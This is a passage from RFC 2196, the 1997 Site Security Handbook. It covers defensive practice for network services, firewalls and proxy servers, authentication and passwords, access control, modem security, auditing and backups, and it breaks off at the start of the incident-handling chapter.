monitoring, hiding of internal structure, etc. This funnelling of
services creates an attractive target for a potential intruder. The
type of protection required for a proxy server depends greatly on the
proxy protocol in use and the services being proxied. The general
rule of limiting access only to those hosts which need the services,
and limiting access by those hosts to only those services, is a good
starting point.

3.2.3.4 Electronic Mail

Electronic mail (email) systems have long been a source for intruder
break-ins because email protocols are among the oldest and most
widely deployed services. Also, by it's very nature, an email server
requires access to the outside world; most email servers accept input
from any source. An email server generally consists of two parts: a
receiving/sending agent and a processing agent. Since email is
delivered to all users, and is usually private, the processing agent
typically requires system (root) privileges to deliver the mail.
Most email implementations perform both portions of the service,
which means the receiving agent also has system privileges. This
opens several security holes which this document will not describe.
There are some implementations available which allow a separation of

Fraser, Ed. Informational [Page 18]

RFC 2196 Site Security Handbook September 1997

the two agents. Such implementations are generally considered more
secure, but still require careful installation to avoid creating a
security problem.

3.2.3.5 World Wide Web (WWW)

The Web is growing in popularity exponentially because of its ease of
use and the powerful ability to concentrate information services.
Most WWW servers accept some type of direction and action from the
persons accessing their services. The most common example is taking
a request from a remote user and passing the provided information to
a program running on the server to process the request. Some of
these programs are not written with security in mind and can create
security holes. If a Web server is available to the Internet
community, it is especially important that confidential information
not be co-located on the same host as that server. In fact, it is
recommended that the server have a dedicated host which is not
"trusted" by other internal hosts.

Many sites may want to co-locate FTP service with their WWW service.
But this should only occur for anon-ftp servers that only provide
information (ftp-get). Anon-ftp puts, in combination with WWW, might
be dangerous (e.g., they could result in modifications to the
information your site is publishing to the web) and in themselves
make the security considerations for each service different.

3.2.3.6 File Transfer (FTP, TFTP)

FTP and TFTP both allow users to receive and send electronic files in
a point-to-point manner. However, FTP requires authentication while
TFTP requires none. For this reason, TFTP should be avoided as much
as possible.

Improperly configured FTP servers can allow intruders to copy,
replace and delete files at will, anywhere on a host, so it is very
important to configure this service correctly. Access to encrypted
passwords and proprietary data, and the introduction of Trojan horses
are just a few of the potential security holes that can occur when
the service is configured incorrectly. FTP servers should reside on
their own host. Some sites choose to co-locate FTP with a Web
server, since the two protocols share common security considerations
However, the the practice isn't recommended, especially when the FTP
service allows the deposit of files (see section on WWW above). As
mentioned in the opening paragraphs of section 3.2.3, services
offered internally to your site should not be co-located with
services offered externally. Each should have its own host.

Fraser, Ed. Informational [Page 19]

RFC 2196 Site Security Handbook September 1997

TFTP does not support the same range of functions as FTP, and has no
security whatsoever. This service should only be considered for
internal use, and then it should be configured in a restricted way so
that the server only has access to a set of predetermined files
(instead of every world-readable file on the system). Probably the
most common usage of TFTP is for downloading router configuration
files to a router. TFTP should reside on its own host, and should
not be installed on hosts supporting external FTP or Web access.

3.2.3.7 NFS

The Network File Service allows hosts to share common disks. NFS is
frequently used by diskless hosts who depend on a disk server for all
of their storage needs. Unfortunately, NFS has no built-in security.
It is therefore necessary that the NFS server be accessable only by
those hosts which are using it for service. This is achieved by
specifying which hosts the file system is being exported to and in
what manner (e.g., read-only, read-write, etc.). Filesystems should
not be exported to any hosts outside the local network since this
will require that the NFS service be accessible externally. Ideally,
external access to NFS service should be stopped by a firewall.

3.2.4 Protecting the Protection

It is amazing how often a site will overlook the most obvious
weakness in its security by leaving the security server itself open
to attack. Based on considerations previously discussed, it should
be clear that: the security server should not be accessible from
off-site; should offer minimum access, except for the authentication
function, to users on-site; and should not be co-located with any
other servers. Further, all access to the node, including access to
the service itself, should be logged to provide a "paper trail" in
the event of a security breach.

3.3 Firewalls

One of the most widely deployed and publicized security measures in
use on the Internet is a "firewall." Firewalls have been given the
reputation of a general panacea for many, if not all, of the Internet
security issues. They are not. Firewalls are just another tool in
the quest for system security. They provide a certain level of
protection and are, in general, a way of implementing security policy
at the network level. The level of security that a firewall provides
can vary as much as the level of security on a particular machine.
There are the traditional trade-offs between security, ease of use,
cost, complexity, etc.

Fraser, Ed. Informational [Page 20]

RFC 2196 Site Security Handbook September 1997

A firewall is any one of several mechanisms used to control and watch
access to and from a network for the purpose of protecting it. A
firewall acts as a gateway through which all traffic to and from the
protected network and/or systems passes. Firewalls help to place
limitations on the amount and type of communication that takes place
between the protected network and the another network (e.g., the
Internet, or another piece of the site's network).

A firewall is generally a way to build a wall between one part of a
network, a company's internal network, for example, and another part,
the global Internet, for example. The unique feature about this wall
is that there needs to be ways for some traffic with particular
characteristics to pass through carefully monitored doors
("gateways"). The difficult part is establishing the criteria by
which the packets are allowed or denied access through the doors.
Books written on firewalls use different terminology to describe the
various forms of firewalls. This can be confusing to system
administrators who are not familiar with firewalls. The thing to note
here is that there is no fixed terminology for the description of
firewalls.

Firewalls are not always, or even typically, a single machine.
Rather, firewalls are often a combination of routers, network
segments, and host computers. Therefore, for the purposes of this
discussion, the term "firewall" can consist of more than one physical
device. Firewalls are typically built using two different
components, filtering routers and proxy servers.

Filtering routers are the easiest component to conceptualize in a
firewall. A router moves data back and forth between two (or more)
different networks. A "normal" router takes a packet from network A
and "routes" it to its destination on network B. A filtering router
does the same thing but decides not only how to route the packet, but
whether it should route the packet. This is done by installing a
series of filters by which the router decides what to do with any
given packet of data.

A discussion concerning capabilities of a particular brand of router,
running a particular software version is outside the scope of this
document. However, when evaluating a router to be used for filtering
packets, the following criteria can be important when implementing a
filtering policy: source and destination IP address, source and
destination TCP port numbers, state of the TCP "ack" bit, UDP source
and destination port numbers, and direction of packet flow (i.e.. A-
>B or B->A). Other information necessary to construct a secure
filtering scheme are whether the router reorders filter instructions
(designed to optimize filters, this can sometimes change the meaning
and cause unintended access), and whether it is possible to apply

Fraser, Ed. Informational [Page 21]

RFC 2196 Site Security Handbook September 1997

filters for inbound and outbound packets on each interface (if the
router filters only outbound packets then the router is "outside" of
its filters and may be more vulnerable to attack). In addition to
the router being vulnerable, this distinction between applying
filters on inbound or outbound packets is especially relevant for
routers with more than 2 interfaces. Other important issues are the
ability to create filters based on IP header options and the fragment
state of a packet. Building a good filter can be very difficult and
requires a good understanding of the type of services (protocols)
that will be filtered.

For better security, the filters usually restrict access between the
two connected nets to just one host, the bastion host. It is only
possible to access the other network via this bastion host. As only
this host, rather than a few hundred hosts, can get attacked, it is
easier to maintain a certain level of security because only this host
has to be protected very carefully. To make resources available to
legitimate users across this firewall, services have to be forwarded
by the bastion host. Some servers have forwarding built in (like
DNS-servers or SMTP-servers), for other services (e.g., Telnet, FTP,
etc.), proxy servers can be used to allow access to the resources
across the firewall in a secure way.

A proxy server is way to concentrate application services through a
single machine. There is typically a single machine (the bastion
host) that acts as a proxy server for a variety of protocols (Telnet,
SMTP, FTP, HTTP, etc.) but there can be individual host computers for
each service. Instead of connecting directly to an external server,
the client connects to the proxy server which in turn initiates a
connection to the requested external server. Depending on the type
of proxy server used, it is possible to configure internal clients to
perform this redirection automatically, without knowledge to the
user, others might require that the user connect directly to the
proxy server and then initiate the connection through a specified
format.

There are significant security benefits which can be derived from
using proxy servers. It is possible to add access control lists to
protocols, requiring users or systems to provide some level of
authentication before access is granted. Smarter proxy servers,
sometimes called Application Layer Gateways (ALGs), can be written
which understand specific protocols and can be configured to block
only subsections of the protocol. For example, an ALG for FTP can
tell the difference between the "put" command and the "get" command;
an organization may wish to allow users to "get" files from the
Internet, but not be able to "put" internal files on a remote server.
By contrast, a filtering router could either block all FTP access, or
none, but not a subset.

Fraser, Ed. Informational [Page 22]

RFC 2196 Site Security Handbook September 1997

Proxy servers can also be configured to encrypt data streams based on
a variety of parameters. An organization might use this feature to
allow encrypted connections between two locations whose sole access
points are on the Internet.

Firewalls are typically thought of as a way to keep intruders out,
but they are also often used as a way to let legitimate users into a
site. There are many examples where a valid user might need to
regularly access the "home" site while on travel to trade shows and
conferences, etc. Access to the Internet is often available but may
be through an untrusted machine or network. A correctly configured
proxy server can allow the correct users into the site while still
denying access to other users.

The current best effort in firewall techniques is found using a
combination of a pair of screening routers with one or more proxy
servers on a network between the two routers. This setup allows the
external router to block off any attempts to use the underlying IP
layer to break security (IP spoofing, source routing, packet
fragments), while allowing the proxy server to handle potential
security holes in the higher layer protocols. The internal router's
purpose is to block all traffic except to the proxy server. If this
setup is rigidly implemented, a high level of security can be
achieved.

Most firewalls provide logging which can be tuned to make security
administration of the network more convenient. Logging may be
centralized and the system may be configured to send out alerts for
abnormal conditions. It is important to regularly monitor these logs
for any signs of intrusions or break-in attempts. Since some
intruders will attempt to cover their tracks by editing logs, it is
desirable to protect these logs. A variety of methods is available,
including: write once, read many (WORM) drives; papers logs; and
centralized logging via the "syslog" utility. Another technique is
to use a "fake" serial printer, but have the serial port connected to
an isolated machine or PC which keeps the logs.

Firewalls are available in a wide range of quality and strengths.
Commercial packages start at approximately $10,000US and go up to
over $250,000US. "Home grown" firewalls can be built for smaller
amounts of capital. It should be remembered that the correct setup
of a firewall (commercial or homegrown) requires a significant amount
of skill and knowledge of TCP/IP. Both types require regular
maintenance, installation of software patches and updates, and
regular monitoring. When budgeting for a firewall, these additional
costs should be considered in addition to the cost of the physical
elements of the firewall.

Fraser, Ed. Informational [Page 23]

RFC 2196 Site Security Handbook September 1997

As an aside, building a "home grown" firewall requires a significant
amount of skill and knowledge of TCP/IP. It should not be trivially
attempted because a perceived sense of security is worse in the long
run than knowing that there is no security. As with all security
measures, it is important to decide on the threat, the value of the
assets to be protected, and the costs to implement security.

A final note about firewalls. They can be a great aid when
implementing security for a site and they protect against a large
variety of attacks. But it is important to keep in mind that they
are only one part of the solution. They cannot protect your site
against all types of attack.

4. Security Services and Procedures

This chapter guides the reader through a number of topics that should
be addressed when securing a site. Each section touches on a
security service or capability that may be required to protect the
information and systems at a site. The topics are presented at a
fairly high-level to introduce the reader to the concepts.

Throughout the chapter, you will find significant mention of
cryptography. It is outside the scope of this document to delve into
details concerning cryptography, but the interested reader can obtain
more information from books and articles listed in the reference
section of this document.

4.1 Authentication

For many years, the prescribed method for authenticating users has
been through the use of standard, reusable passwords. Originally,
these passwords were used by users at terminals to authenticate
themselves to a central computer. At the time, there were no
networks (internally or externally), so the risk of disclosure of the
clear text password was minimal. Today, systems are connected
together through local networks, and these local networks are further
connected together and to the Internet. Users are logging in from
all over the globe; their reusable passwords are often transmitted
across those same networks in clear text, ripe for anyone in-between
to capture. And indeed, the CERT* Coordination Center and other
response teams are seeing a tremendous number of incidents involving
packet sniffers which are capturing the clear text passwords.

With the advent of newer technologies like one-time passwords (e.g.,
S/Key), PGP, and token-based authentication devices, people are using
password-like strings as secret tokens and pins. If these secret
tokens and pins are not properly selected and protected, the
authentication will be easily subverted.

Fraser, Ed. Informational [Page 24]

RFC 2196 Site Security Handbook September 1997

4.1.1 One-Time passwords

As mentioned above, given today's networked environments, it is
recommended that sites concerned about the security and integrity of
their systems and networks consider moving away from standard,
reusable passwords. There have been many incidents involving Trojan
network programs (e.g., telnet and rlogin) and network packet
sniffing programs. These programs capture clear text
hostname/account name/password triplets. Intruders can use the
captured information for subsequent access to those hosts and
accounts. This is possible because 1) the password is used over and
over (hence the term "reusable"), and 2) the password passes across
the network in clear text.

Several authentication techniques have been developed that address
this problem. Among these techniques are challenge-response
technologies that provide passwords that are only used once (commonly
called one-time passwords). There are a number of products available
that sites should consider using. The decision to use a product is
the responsibility of each organization, and each organization should
perform its own evaluation and selection.

4.1.2 Kerberos

Kerberos is a distributed network security system which provides for
authentication across unsecured networks. If requested by the
application, integrity and encryption can also be provided. Kerberos
was originally developed at the Massachusetts Institute of Technology
(MIT) in the mid 1980s. There are two major releases of Kerberos,
version 4 and 5, which are for practical purposes, incompatible.

Kerberos relies on a symmetric key database using a key distribution
center (KDC) which is known as the Kerberos server. A user or
service (known as "principals") are granted electronic "tickets"
after properly communicating with the KDC. These tickets are used
for authentication between principals. All tickets include a time
stamp which limits the time period for which the ticket is valid.
Therefore, Kerberos clients and server must have a secure time
source, and be able to keep time accurately.

The practical side of Kerberos is its integration with the
application level. Typical applications like FTP, telnet, POP, and
NFS have been integrated with the Kerberos system. There are a
variety of implementations which have varying levels of integration.
Please see the Kerberos FAQ available at http://www.ov.com/misc/krb-
faq.html for the latest information.

Fraser, Ed. Informational [Page 25]

RFC 2196 Site Security Handbook September 1997

4.1.3 Choosing and Protecting Secret Tokens and PINs

When selecting secret tokens, take care to choose them carefully.
Like the selection of passwords, they should be robust against brute
force efforts to guess them. That is, they should not be single
words in any language, any common, industry, or cultural acronyms,
etc. Ideally, they will be longer rather than shorter and consist of
pass phrases that combine upper and lower case character, digits, and
other characters.

Once chosen, the protection of these secret tokens is very important.
Some are used as pins to hardware devices (like token cards) and
these should not be written down or placed in the same location as
the device with which they are associated. Others, such as a secret
Pretty Good Privacy (PGP) key, should be protected from unauthorized
access.

One final word on this subject. When using cryptography products,
like PGP, take care to determine the proper key length and ensure
that your users are trained to do likewise. As technology advances,
the minimum safe key length continues to grow. Make sure your site
keeps up with the latest knowledge on the technology so that you can
ensure that any cryptography in use is providing the protection you
believe it is.

4.1.4 Password Assurance

While the need to eliminate the use of standard, reusable passwords
cannot be overstated, it is recognized that some organizations may
still be using them. While it's recommended that these organizations
transition to the use of better technology, in the mean time, we have
the following advice to help with the selection and maintenance of
traditional passwords. But remember, none of these measures provides
protection against disclosure due to sniffer programs.

(1) The importance of robust passwords - In many (if not most) cases
of system penetration, the intruder needs to gain access to an
account on the system. One way that goal is typically
accomplished is through guessing the password of a legitimate
user. This is often accomplished by running an automated
password cracking program, which utilizes a very large
dictionary, against the system's password file. The only way to
guard against passwords being disclosed in this manner is
through the careful selection of passwords which cannot be
easily guessed (i.e., combinations of numbers, letters, and
punctuation characters). Passwords should also be as long as
the system supports and users can tolerate.

Fraser, Ed. Informational [Page 26]

RFC 2196 Site Security Handbook September 1997

(2) Changing default passwords - Many operating systems and
application programs are installed with default accounts and
passwords. These must be changed immediately to something that
cannot be guessed or cracked.

(3) Restricting access to the password file - In particular, a site
wants to protect the encrypted password portion of the file so
that would-be intruders don't have them available for cracking.
One effective technique is to use shadow passwords where the
password field of the standard file contains a dummy or false
password. The file containing the legitimate passwords are
protected elsewhere on the system.

(4) Password aging - When and how to expire passwords is still a
subject of controversy among the security community. It is
generally accepted that a password should not be maintained once
an account is no longer in use, but it is hotly debated whether
a user should be forced to change a good password that's in
active use. The arguments for changing passwords relate to the
prevention of the continued use of penetrated accounts.
However, the opposition claims that frequent password changes
lead to users writing down their passwords in visible areas
(such as pasting them to a terminal), or to users selecting very
simple passwords that are easy to guess. It should also be
stated that an intruder will probably use a captured or guessed
password sooner rather than later, in which case password aging
provides little if any protection.

While there is no definitive answer to this dilemma, a password
policy should directly address the issue and provide guidelines
for how often a user should change the password. Certainly, an
annual change in their password is usually not difficult for
most users, and you should consider requiring it. It is
recommended that passwords be changed at least whenever a
privileged account is compromised, there is a critical change in
personnel (especially if it is an administrator!), or when an
account has been compromised. In addition, if a privileged
account password is compromised, all passwords on the system
should be changed.

(5) Password/account blocking - Some sites find it useful to disable
accounts after a predefined number of failed attempts to
authenticate. If your site decides to employ this mechanism, it
is recommended that the mechanism not "advertise" itself. After

Fraser, Ed. Informational [Page 27]

RFC 2196 Site Security Handbook September 1997

disabling, even if the correct password is presented, the
message displayed should remain that of a failed login attempt.
Implementing this mechanism will require that legitimate users
contact their system administrator to request that their account
be reactivated.

(6) A word about the finger daemon - By default, the finger daemon
displays considerable system and user information. For example,
it can display a list of all users currently using a system, or
all the contents of a specific user's .plan file. This
information can be used by would-be intruders to identify
usernames and guess their passwords. It is recommended that
sites consider modifying finger to restrict the information
displayed.

4.2 Confidentiality

There will be information assets that your site will want to protect
from disclosure to unauthorized entities. Operating systems often
have built-in file protection mechanisms that allow an administrator
to control who on the system can access, or "see," the contents of a
given file. A stronger way to provide confidentiality is through
encryption. Encryption is accomplished by scrambling data so that it
is very difficult and time consuming for anyone other than the
authorized recipients or owners to obtain the plain text. Authorized
recipients and the owner of the information will possess the
corresponding decryption keys that allow them to easily unscramble
the text to a readable (clear text) form. We recommend that sites
use encryption to provide confidentiality and protect valuable
information.

The use of encryption is sometimes controlled by governmental and
site regulations, so we encourage administrators to become informed
of laws or policies that regulate its use before employing it. It is
outside the scope of this document to discuss the various algorithms
and programs available for this purpose, but we do caution against
the casual use of the UNIX crypt program as it has been found to be
easily broken. We also encourage everyone to take time to understand
the strength of the encryption in any given algorithm/product before
using it. Most well-known products are well-documented in the
literature, so this should be a fairly easy task.

4.3 Integrity

As an administrator, you will want to make sure that information
(e.g., operating system files, company data, etc.) has not been
altered in an unauthorized fashion. This means you will want to
provide some assurance as to the integrity of the information on your

Fraser, Ed. Informational [Page 28]

RFC 2196 Site Security Handbook September 1997

systems. One way to provide this is to produce a checksum of the
unaltered file, store that checksum offline, and periodically (or
when desired) check to make sure the checksum of the online file
hasn't changed (which would indicate the data has been modified).

Some operating systems come with checksumming programs, such as the
UNIX sum program. However, these may not provide the protection you
actually need. Files can be modified in such a way as to preserve
the result of the UNIX sum program! Therefore, we suggest that you
use a cryptographically strong program, such as the message digesting
program MD5 [ref], to produce the checksums you will be using to
assure integrity.

There are other applications where integrity will need to be assured,
such as when transmitting an email message between two parties. There
are products available that can provide this capability. Once you
identify that this is a capability you need, you can go about
identifying technologies that will provide it.

4.4 Authorization

Authorization refers to the process of granting privileges to
processes and, ultimately, users. This differs from authentication
in that authentication is the process used to identify a user. Once
identified (reliably), the privileges, rights, property, and
permissible actions of the user are determined by authorization.

Explicitly listing the authorized activities of each user (and user
process) with respect to all resources (objects) is impossible in a
reasonable system. In a real system certain techniques are used to
simplify the process of granting and checking authorization(s).

One approach, popularized in UNIX systems, is to assign to each
object three classes of user: owner, group and world. The owner is
either the creator of the object or the user assigned as owner by the
super-user. The owner permissions (read, write and execute) apply
only to the owner. A group is a collection of users which share
access rights to an object. The group permissions (read, write and
execute) apply to all users in the group (except the owner). The
world refers to everybody else with access to the system. The world
permissions (read, write and execute) apply to all users (except the
owner and members of the group).

Another approach is to attach to an object a list which explicitly
contains the identity of all permitted users (or groups). This is an
Access Control List (ACL). The advantage of ACLs are that they are

Fraser, Ed. Informational [Page 29]

RFC 2196 Site Security Handbook September 1997

easily maintained (one central list per object) and it's very easy to
visually check who has access to what. The disadvantages are the
extra resources required to store such lists, as well as the vast
number of such lists required for large systems.

4.5 Access

4.5.1 Physical Access

Restrict physical access to hosts, allowing access only to those
people who are supposed to use the hosts. Hosts include "trusted"
terminals (i.e., terminals which allow unauthenticated use such as
system consoles, operator terminals and terminals dedicated to
special tasks), and individual microcomputers and workstations,
especially those connected to your network. Make sure people's work
areas mesh well with access restrictions; otherwise they will find
ways to circumvent your physical security (e.g., jamming doors open).

Keep original and backup copies of data and programs safe. Apart
from keeping them in good condition for backup purposes, they must be
protected from theft. It is important to keep backups in a separate
location from the originals, not only for damage considerations, but
also to guard against thefts.

Portable hosts are a particular risk. Make sure it won't cause
problems if one of your staff's portable computer is stolen.
Consider developing guidelines for the kinds of data that should be
allowed to reside on the disks of portable computers as well as how
the data should be protected (e.g., encryption) when it is on a
portable computer.

Other areas where physical access should be restricted is the wiring
closets and important network elements like file servers, name server
hosts, and routers.

4.5.2 Walk-up Network Connections

By "walk-up" connections, we mean network connection points located
to provide a convenient way for users to connect a portable host to
your network.

Consider whether you need to provide this service, bearing in mind
that it allows any user to attach an unauthorized host to your
network. This increases the risk of attacks via techniques such as

Fraser, Ed. Informational [Page 30]

RFC 2196 Site Security Handbook September 1997

IP address spoofing, packet sniffing, etc. Users and site management
must appreciate the risks involved. If you decide to provide walk-up
connections, plan the service carefully and define precisely where
you will provide it so that you can ensure the necessary physical
access security.

A walk-up host should be authenticated before its user is permitted
to access resources on your network. As an alternative, it may be
possible to control physical access. For example, if the service is
to be used by students, you might only provide walk-up connection
sockets in student laboratories.

If you are providing walk-up access for visitors to connect back to
their home networks (e.g., to read e-mail, etc.) in your facility,
consider using a separate subnet that has no connectivity to the
internal network.

Keep an eye on any area that contains unmonitored access to the
network, such as vacant offices. It may be sensible to disconnect
such areas at the wiring closet, and consider using secure hubs and
monitoring attempts to connect unauthorized hosts.

4.5.3 Other Network Technologies

Technologies considered here include X.25, ISDN, SMDS, DDS and Frame
Relay. All are provided via physical links which go through
telephone exchanges, providing the potential for them to be diverted.
Crackers are certainly interested in telephone switches as well as in
data networks!

With switched technologies, use Permanent Virtual Circuits or Closed
User Groups whenever this is possible. Technologies which provide
authentication and/or encryption (such as IPv6) are evolving rapidly;
consider using them on links where security is important.

4.5.4 Modems

4.5.4.1 Modem Lines Must Be Managed

Although they provide convenient access to a site for its users, they
can also provide an effective detour around the site's firewalls.
For this reason it is essential to maintain proper control of modems.

Don't allow users to install a modem line without proper
authorization. This includes temporary installations (e.g., plugging
a modem into a facsimile or telephone line overnight).

Fraser, Ed. Informational [Page 31]

RFC 2196 Site Security Handbook September 1997

Maintain a register of all your modem lines and keep your register up
to date. Conduct regular (ideally automated) site checks for
unauthorized modems.

4.5.4.2 Dial-in Users Must Be Authenticated

A username and password check should be completed before a user can
access anything on your network. Normal password security
considerations are particularly important (see section 4.1.1).

Remember that telephone lines can be tapped, and that it is quite
easy to intercept messages to cellular phones. Modern high-speed
modems use more sophisticated modulation techniques, which makes them
somewhat more difficult to monitor, but it is prudent to assume that
hackers know how to eavesdrop on your lines. For this reason, you
should use one-time passwords if at all possible.

It is helpful to have a single dial-in point (e.g., a single large
modem pool) so that all users are authenticated in the same way.

Users will occasionally mis-type a password. Set a short delay - say
two seconds - after the first and second failed logins, and force a
disconnect after the third. This will slow down automated password
attacks. Don't tell the user whether the username, the password, or
both, were incorrect.

4.5.4.3 Call-back Capability

Some dial-in servers offer call-back facilities (i.e., the user dials
in and is authenticated, then the system disconnects the call and
calls back on a specified number). Call-back is useful since if
someone were to guess a username and password, they are disconnected,
and the system then calls back the actual user whose password was
cracked; random calls from a server are suspicious, at best. This
does mean users may only log in from one location (where the server
is configured to dial them back), and of course there may be phone
charges associated with there call-back location.

This feature should be used with caution; it can easily be bypassed.
At a minimum, make sure that the return call is never made from the
same modem as the incoming one. Overall, although call-back can
improve modem security, you should not depend on it alone.

4.5.4.4 All Logins Should Be Logged

All logins, whether successful or unsuccessful should be logged.
However, do not keep correct passwords in the log. Rather, log them
simply as a successful login attempt. Since most bad passwords are

Fraser, Ed. Informational [Page 32]

RFC 2196 Site Security Handbook September 1997

mistyped by authorized users, they only vary by a single character
from the actual password. Therefore if you can't keep such a log
secure, don't log it at all.

If Calling Line Identification is available, take advantage of it by
recording the calling number for each login attempt. Be sensitive to
the privacy issues raised by Calling Line Identification. Also be
aware that Calling Line Identification is not to be trusted (since
intruders have been known to break into phone switches and forward
phone numbers or make other changes); use the data for informational
purposes only, not for authentication.

4.5.4.5 Choose Your Opening Banner Carefully

Many sites use a system default contained in a message of the day
file for their opening banner. Unfortunately, this often includes the
type of host hardware or operating system present on the host. This
can provide valuable information to a would-be intruder. Instead,
each site should create its own specific login banner, taking care to
only include necessary information.

Display a short banner, but don't offer an "inviting" name (e.g.,
University of XYZ, Student Records System). Instead, give your site
name, a short warning that sessions may be monitored, and a
username/password prompt. Verify possible legal issues related to
the text you put into the banner.

For high-security applications, consider using a "blind" password
(i.e., give no response to an incoming call until the user has typed
in a password). This effectively simulates a dead modem.

4.5.4.6 Dial-out Authentication

Dial-out users should also be authenticated, particularly since your
site will have to pay their telephone charges.

Never allow dial-out from an unauthenticated dial-in call, and
consider whether you will allow it from an authenticated one. The
goal here is to prevent callers using your modem pool as part of a
chain of logins. This can be hard to detect, particularly if a
hacker sets up a path through several hosts on your site.

At a minimum, don't allow the same modems and phone lines to be used
for both dial-in and dial-out. This can be implemented easily if you
run separate dial-in and dial-out modem pools.

Fraser, Ed. Informational [Page 33]

RFC 2196 Site Security Handbook September 1997

4.5.4.7 Make Your Modem Programming as "Bullet-proof" as Possible

Be sure modems can't be reprogrammed while they're in service. At a
minimum, make sure that three plus signs won't put your dial-in
modems into command mode!

Program your modems to reset to your standard configuration at the
start of each new call. Failing this, make them reset at the end of
each call. This precaution will protect you against accidental
reprogramming of your modems. Resetting at both the end and the
beginning of each call will assure an even higher level of confidence
that a new caller will not inherit a previous caller's session.

Check that your modems terminate calls cleanly. When a user logs out
from an access server, verify that the server hangs up the phone line
properly. It is equally important that the server forces logouts
from whatever sessions were active if the user hangs up unexpectedly.

4.6 Auditing

This section covers the procedures for collecting data generated by
network activity, which may be useful in analyzing the security of a
network and responding to security incidents.

4.6.1 What to Collect

Audit data should include any attempt to achieve a different security
level by any person, process, or other entity in the network. This
includes login and logout, super user access (or the non-UNIX
equivalent), ticket generation (for Kerberos, for example), and any
other change of access or status. It is especially important to note
"anonymous" or "guest" access to public servers.

The actual data to collect will differ for different sites and for
different types of access changes within a site. In general, the
information you want to collect includes: username and hostname, for
login and logout; previous and new access rights, for a change of
access rights; and a timestamp. Of course, there is much more
information which might be gathered, depending on what the system
makes available and how much space is available to store that
information.

One very important note: do not gather passwords. This creates an
enormous potential security breach if the audit records should be
improperly accessed. Do not gather incorrect passwords either, as
they often differ from valid passwords by only a single character or
transposition.

Fraser, Ed. Informational [Page 34]

RFC 2196 Site Security Handbook September 1997

4.6.2 Collection Process

The collection process should be enacted by the host or resource
being accessed. Depending on the importance of the data and the need
to have it local in instances in which services are being denied,
data could be kept local to the resource until needed or be
transmitted to storage after each event.

There are basically three ways to store audit records: in a
read/write file on a host, on a write-once/read-many device (e.g., a
CD-ROM or a specially configured tape drive), or on a write-only
device (e.g., a line printer). Each method has advantages and
disadvantages.

File system logging is the least resource intensive of the three
methods and the easiest to configure. It allows instant access to
the records for analysis, which may be important if an attack is in
progress. File system logging is also the least reliable method. If
the logging host has been compromised, the file system is usually the
first thing to go; an intruder could easily cover up traces of the
intrusion.

Collecting audit data on a write-once device is slightly more effort
to configure than a simple file, but it has the significant advantage
of greatly increased security because an intruder could not alter the
data showing that an intrusion has occurred. The disadvantage of
this method is the need to maintain a supply of storage media and the
cost of that media. Also, the data may not be instantly available.

Line printer logging is useful in system where permanent and
immediate logs are required. A real time system is an example of
this, where the exact point of a failure or attack must be recorded.
A laser printer, or other device which buffers data (e.g., a print
server), may suffer from lost data if buffers contain the needed data
at a critical instant. The disadvantage of, literally, "paper
trails" is the need to keep the printer fed and the need to scan
records by hand. There is also the issue of where to store the,
potentially, enormous volume of paper which may be generated.

For each of the logging methods described, there is also the issue of
securing the path between the device generating the log and actual
logging device (i.e., the file server, tape/CD-ROM drive, printer).
If that path is compromised, logging can be stopped or spoofed or
both. In an ideal world, the logging device would be directly

Fraser, Ed. Informational [Page 35]

RFC 2196 Site Security Handbook September 1997

attached by a single, simple, point-to-point cable. Since that is
usually impractical, the path should pass through the minimum number
of networks and routers. Even if logs can be blocked, spoofing can
be prevented with cryptographic checksums (it probably isn't
necessary to encrypt the logs because they should not contain
sensitive information in the first place).

4.6.3 Collection Load

Collecting audit data may result in a rapid accumulation of bytes so
storage availability for this information must be considered in
advance. There are a few ways to reduce the required storage space.
First, data can be compressed, using one of many methods. Or, the
required space can be minimized by keeping data for a shorter period
of time with only summaries of that data kept in long-term archives.
One major drawback to the latter method involves incident response.
Often, an incident has been ongoing for some period of time when a
site notices it and begins to investigate. At that point in time,
it's very helpful to have detailed audit logs available. If these are
just summaries, there may not be sufficient detail to fully handle
the incident.

4.6.4 Handling and Preserving Audit Data

Audit data should be some of the most carefully secured data at the
site and in the backups. If an intruder were to gain access to audit
logs, the systems themselves, in addition to the data, would be at
risk.

Audit data may also become key to the investigation, apprehension,
and prosecution of the perpetrator of an incident. For this reason,
it is advisable to seek the advice of legal council when deciding how
audit data should be treated. This should happen before an incident
occurs.

If a data handling plan is not adequately defined prior to an
incident, it may mean that there is no recourse in the aftermath of
an event, and it may create liability resulting from improper
treatment of the data.

4.6.5 Legal Considerations

Due to the content of audit data, there are a number of legal
questions that arise which might need to be addressed by your legal
counsel. If you collect and save audit data, you need to be prepared
for consequences resulting both from its existence and its content.

Fraser, Ed. Informational [Page 36]

RFC 2196 Site Security Handbook September 1997

One area concerns the privacy of individuals. In certain instances,
audit data may contain personal information. Searching through the
data, even for a routine check of the system's security, could
represent an invasion of privacy.

A second area of concern involves knowledge of intrusive behavior
originating from your site. If an organization keeps audit data, is
it responsible for examining it to search for incidents? If a host
in one organization is used as a launching point for an attack
against another organization, can the second organization use the
audit data of the first organization to prove negligence on the part
of that organization?

The above examples are meant to be comprehensive, but should motivate
your organization to consider the legal issues involved with audit
data.

4.7 Securing Backups

The procedure of creating backups is a classic part of operating a
computer system. Within the context of this document, backups are
addressed as part of the overall security plan of a site. There are
several aspects to backups that are important within this context:

(1) Make sure your site is creating backups
(2) Make sure your site is using offsite storage for backups. The
storage site should be carefully selected for both its security
and its availability.
(3) Consider encrypting your backups to provide additional protection
of the information once it is off-site. However, be aware that
you will need a good key management scheme so that you'll be
able to recover data at any point in the future. Also, make
sure you will have access to the necessary decryption programs
at such time in the future as you need to perform the
decryption.
(4) Don't always assume that your backups are good. There have been
many instances of computer security incidents that have gone on
for long periods of time before a site has noticed the incident.
In such cases, backups of the affected systems are also tainted.
(5) Periodically verify the correctness and completeness of your
backups.

5. Security Incident Handling

This chapter of the document will supply guidance to be used before,
during, and after a computer security incident occurs on a host,
network, site, or multi-site environment. The operative philosophy
in the event of a breach of computer security is to react according

Fraser, Ed. Informational [Page 37]

RFC 2196 Site Security Handbook September 1997

to a plan. This is true whether the breach is the result of an
external intruder attack, unintentional damage, a student testing
some new program to exploit a software vulnerability, or a
disgruntled employee. Each of the possible types of events, such as
those just listed, should be addressed in advance by adequate
contingency plans.

Traditional computer security, while quite important in the overall
site security plan, usually pays little attention to how to actually
handle an attack once one occurs. The result is that when an attack
is in progress, many decisions are made in haste and can be damaging
to tracking down the source of the incident, collecting evidence to
be used in prosecution efforts, preparing for the recovery of the
system, and protecting the valuable data contained on the system.

One of the most important, but often overlooked, benefits for
efficient incident handling is an economic one. Having both
